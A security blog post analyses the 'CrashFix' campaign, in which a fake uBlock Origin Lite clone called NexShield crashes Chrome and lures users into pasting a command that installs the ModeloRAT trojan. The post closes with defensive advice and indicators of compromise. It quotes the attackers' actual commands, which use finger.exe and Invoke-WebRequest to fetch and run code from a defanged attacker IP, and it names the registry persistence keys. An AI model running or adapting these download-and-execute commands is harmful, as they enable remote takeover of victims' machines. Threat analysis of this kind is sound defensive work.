# How can a "harmless" Chrome extension crash your browser and take over your computer?

## **Overview**

Have you ever thought about what would happen if a **Chrome extension that looks completely harmless** is actually the start of a sophisticated intrusion? No malware attached to emails, no cracked files, no antivirus warnings—just an **“accidental” browser crash** and a familiar “fix error” suggestion.

The **CrashFix** campaign, recorded in January 2026, shows how the line between **user experience** and **cyber attack** is blurring. Attackers no longer exploit complex technical vulnerabilities but instead target users' **trust and habits**: installing extensions, following instructions, pressing Enter, and leaving the rest to the hacker.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F8cccb4381e6445c19f84698edfd7c743 align="center")

According to recorded reports, this campaign is named **"KongTuke."** In this campaign, researchers identified some new developments: a malicious browser extension called **NexShield** impersonating the legitimate ad blocker **uBlock Origin Lite**, and a ClickFix variant named **"CrashFix"** that intentionally crashes the browser, then tricks users into running malicious commands to deploy **ModeloRAT.**

Ironically, victims searching for an ad blocker encountered a malicious ad. The ad directed users to the official Chrome Web Store `hxxps[://]chromewebstore[.]google[.]com/detail/nexshield-%E2%80%93-advanced-web/cpcdkmjddocikjdkbbeiaafnpdbdafmi,` creating a false sense of legitimacy for the malicious extension.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F27d6ab3f8a3047b68fb80cd661ff0612 align="center")

## **Main Impact**

* Erodes trust in the browser extension ecosystem.
    
* Turns users into triggers for attacks.
    
* Increases the risk of enterprise system breaches.
    
* Difficult to detect and trace through monitoring systems.
    
* Presents new challenges for cybersecurity defense.
    

## **What are CrashFix and NexShield?**

### **CrashFix**

Unlike traditional malware campaigns that rely on attachments or zero-day vulnerabilities, **CrashFix** manipulates users by exploiting their instincts when a browser error occurs, prompting them to seek a "quick fix." This campaign takes advantage of this by using a **fake Chrome extension.**

The danger lies in users themselves triggering the **next stage of the attack**. After the browser crashes, the malicious extension displays a fake error message, instructing users to run a system command, which then paves the way for downloading and installing a **RAT (Remote Access Trojan)** on the victim's computer.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Ffb3b72cf61a34a818a389b9a3798567e align="center")

**CrashFix** is considered an **upgraded version of ClickFix campaigns**, successfully combining:

* Malvertising (malicious advertising).
    
* Fake browser extensions.
    
* Sophisticated social engineering techniques.
    
* And payloads targeting **enterprise environments**.
    

### **NexShield**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769049484933/d0d5f465-f701-450b-b387-ff2574a1c7e8.png align="center")

**NexShield** is known as a malicious browser extension, serving as the first link in the **CrashFix** supply chain. On the surface, **NexShield** is disguised as an ad blocker and web protection tool, even **impersonating uBlock Origin Lite** by copying its name, description, and code structure to appear trustworthy.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F2076e4f4a4014694bcb079d2911c6413 align="left")

Once installed in the browser, NexShield **does not act maliciously right away**. It "hibernates" for about **60 minutes** to avoid detection, then starts creating numerous connections and unusual processes to **drain system resources**, causing the browser to freeze or crash intentionally.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Fd31b254c863342898f3b11ae293e297b align="center")

## **Campaign Details**

To better understand this campaign and how users are unknowingly exploited by hackers, let's go through each stage one by one. Each stage serves as a stepping stone for the next steps and helps maintain the malware on the system for a long time.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769054550346/da9e3283-757c-4df9-a4a9-67a80dc8ae2f.png align="center")

As mentioned earlier, this campaign targets users' trust when they are looking for an extension to block ads on Chrome. Because of this, the attacker directs the victim to the **NexShield download page** on the *Chrome Web Store* (officially hosted, but with malicious content). **NexShield** looks exactly like the *uBlock Origin Lite* extension (open-source and trustworthy), with most of the code being a copy but with added malicious code.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F5cfe27395e224c38b51a54c5d3b5e0be align="left")

This extension will send a **UUID (unique ID)** to the C2 (command-and-control) server, allowing the attacker to track who installed it, when it updates, or when it is removed. Another point, as mentioned, is that the C2 URL is cleverly disguised with a small typo ([`nexsnield.com`](http://nexsnield.com) instead of [`nexshield.com`](http://nexshield.com)) to avoid detection.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Fa79d946fe7ea46dd8372e0d9b22d0781 align="center")

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F55d834424a2e4e4497b5da0dbadc388b align="center")

After waiting for about 60 minutes to avoid detection, NexShield begins to:

* Inject an **infinite loop** that creates billions of internal connections in Chrome, causing **CPU/RAM resource exhaustion** → the browser freezes or crashes repeatedly.
    
* Every 10 minutes, a new DoS cycle starts again.
    
* When the browser restarts after a crash, the extension shows a **fake popup** (named “CrashFix”) saying the browser “stopped unexpectedly” and asks the user to run a command to fix the issue.
    

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F2b6b31b1aad441c4a9b26ba755c7a4e5 align="center")

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2F5c51731d608446569bf5c199e9b9a8c5 align="center")

After installation, the popup will display an error message, but it's just a fake notification, a technique known as **social engineering.** The message will say that your browser has an error and needs fixing. Here, the user will need to open **Run (Win + R)** and **paste (Ctrl + V)** a malicious Powershell command from the clipboard: `"edge.exe -fix-browser -hash=..."`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769065552166/be5c28fc-c069-42e3-8208-68db13ca034a.png align="center")

Once the above command is executed, it uses **finger.exe** (a legitimate Windows tool) as a Living-Off-The-Land Binary (LOLBin) to connect to the attacker's server. Along with this, it downloads another payload, runs a PowerShell script in the AppData folder, and then deletes the script. This officially infects your machine with malware.

Of course, any malware will perform anti-analysis measures once on the victim's machine. With **NexShield**, it also disables the use of DevTools like (F12, Ctrl+Shift+I/J/C), disables the right-click menu, and blocks user actions like highlighting, dragging, and dropping.

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Fa90202db00434f1f9e9c7cd5dc1f2fa8 align="center")

Here, **ModeloRAT** will also be downloaded, a truly dangerous payload. This malware is a *Remote Access Trojan* (RAT) written in **Python** with the name `“`[`modes.py`](http://modes.py)`“`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769066462421/55430868-0de6-49e5-9afa-2fc7161fdc6d.png align="center")

After entering the system, **ModeloRAT** starts the process of establishing a connection with C2 via TCP by using `finger.exe`, a legitimate Windows tool. During the analysis, the command used by the attacker was recorded:

* **cmd /c start "" /min cmd /c "copy %windir%\\system32\\finger.exe %temp%\\ct.exe&%temp%\\ct.exe confirm@199.217.98\[.\]108|cmd"**
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769067029419/dd7c0510-7fd6-413d-9684-9c13cedc8d67.png align="center")

In addition, it will allow downloading other DLLs/executables/Python scripts, establish persistence, and run various types of payloads.

* **Invoke-WebRequest -Uri "hxxp://199.217.98\[.\]108/b" -OutFile "$env:APPDATA\\**[**script.ps**](http://script.ps)**1" & "$env:APPDATA\\**[**script.ps**](http://script.ps)**1"  
    Remove-Item "$env:APPDATA\\**[**script.ps**](http://script.ps)**1"**
    

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Fb8ff97ff52814ede8b7dafbf862e67c3 align="left")

To avoid analysis, **ModeloRAT** also:

* Checks for dozens of analysis tools (e.g., Wireshark, debugger) or virtual environments — if it detects a sandbox, it stops working.
    
* Sends device information, a list of running antivirus programs, and the type of system (domain vs. WORKGROUP) to the C2.
    
* Uses a DGA (Domain Generation Algorithm) mechanism to communicate with the server, preventing blocking by trying different domains.
    

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Fe1d2cc4eeb5a492188a4b7209d7560c7 align="center")

## **Persistence Mechanism**

Like typical campaigns, the attacker's goal is **not just to infiltrate once**, but to:

* Remain on the victim's machine for a long time.
    
* Restart automatically after a reboot.
    
* Be difficult for users or IT to detect.
    
* Appear like legitimate behavior/software.
    

![](https://cdn.builder.io/api/v1/image/assets%2F3eb6f92aedf74f109c7b4b0897ec39a8%2Fa6f56d4221064b0aa4864f2e523df2ed align="center")

**ModeloRAT** will create persistence by writing to the registry:

* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
    
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
    

The key names will be disguised by the attacker to **look like legitimate software**, for example: `Spotify47`, `Adobe2841`, or `ChromeUpdate`. Additionally, ModeloRAT **does not place files in "suspicious" locations** like Desktop or Downloads; instead, they are placed in: `%AppData%\Roaming\` or `%LocalAppData%\`. Subfolders have names similar to software like: `update.exe`, `service.exe`, or `helper.exe` to avoid detection.

## **Conclusion**

The **CrashFix campaign by KongTuke** is a prime example of modern attack trends: **no need for complex zero-days, but exploiting user trust**. By disguising itself as a familiar browser utility, the attacker cleverly combines ***typosquatting*, *resource exhaustion*, and *social engineering*** to trick victims into activating the infection chain themselves. The most dangerous aspect is not the fake extension, but the **transition from the browser to the operating system**, where legitimate **LOLBins** and **PowerShell** are abused to install **ModeloRAT**, targeting enterprise environments.

This incident highlights that **browser extensions have become a serious attack surface**, especially in a work environment heavily reliant on browsers. Effective defense cannot rely solely on antivirus but requires **extension control through policy**, monitoring for unusual behavior (clipboard, PowerShell, LOLBins), and most importantly, **raising user awareness** about urgent "fix" notifications. CrashFix shows that the line between "technical error" and "targeted attack" is increasingly blurred, and a single misplaced trust can open the door to deep system infiltration.

## **Recommendations**

1. **Be cautious before installing extensions.**
    
    * **Only install extensions from verified developers** with an official website and a long history.
        
    * Check carefully:
        
        * The extension name (avoid similar names like *NexShield* vs *uBlock*).
            
        * The number of installs (malicious extensions often have low or unusually high installs).
            
        * Release date and update frequency.
            
    * Avoid installing extensions through:
        
        * Ads
            
        * Pop-up "suggestions," "fix errors," "optimize browser"
            
2. **Identify and handle fake alerts (Fake Crash / ClickFix)**
    
    * **A real browser NEVER asks you to:**
        
        * Press `Win + R`
            
        * Paste commands from the clipboard
            
        * Run PowerShell / CMD to "fix errors"
            
    * If you encounter a pop-up:
        
        * Do not follow the instructions
            
        * Close the browser using Task Manager
            
        * Reopen the browser in Safe / Incognito mode
            
        * Remove the most recently installed extension
            
3. **Safe habits for Windows users**
    
    * Do not run PowerShell/CMD commands **if you do not understand what they do**.
        
    * Be alert when:
        
        * The clipboard content changes by itself
            
        * The system demands urgent actions ("Fix now," "Critical error")
            
    * Enable display of:
        
        * File extensions (`.exe`, `.ps1`, `.bat`) to avoid confusion.
            
4. **Protect your computer and operating system**
    
    * Always enable:
        
        * Windows Defender (Realtime Protection)
            
        * SmartScreen
            
    * Update:
        
        * Browser
            
        * Operating system
            
    * Use **a non-admin account** for daily tasks.
        
    * Regularly back up data (cloud or external hard drive).
        

## **IOCs**

1. **Domain C2**
    
    * nexsnield\[.\]com
        
2. **File Hash**
    
    * fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67
        
    * 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4
        
    * c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6
        
    * c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c
        
3. **IP**
    
    * 170.168.103\[.\]208
        
    * 158.247.252\[.\]178
        
4. **Mail**
    
    * [alaynna6899@gmail.com](mailto:alaynna6899@gmail.com)
        

## **Reference**

1. [CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures](https://thehackernews.com/2026/01/crashfix-chrome-extension-delivers.html)
    
2. [Dissecting CrashFix: KongTuke's New Toy | Huntress](https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke)
    
3. [GitHub - uBlockOrigin/uBOL-home: uBO Lite home (MV3)](https://github.com/uBlockOrigin/uBOL-home)
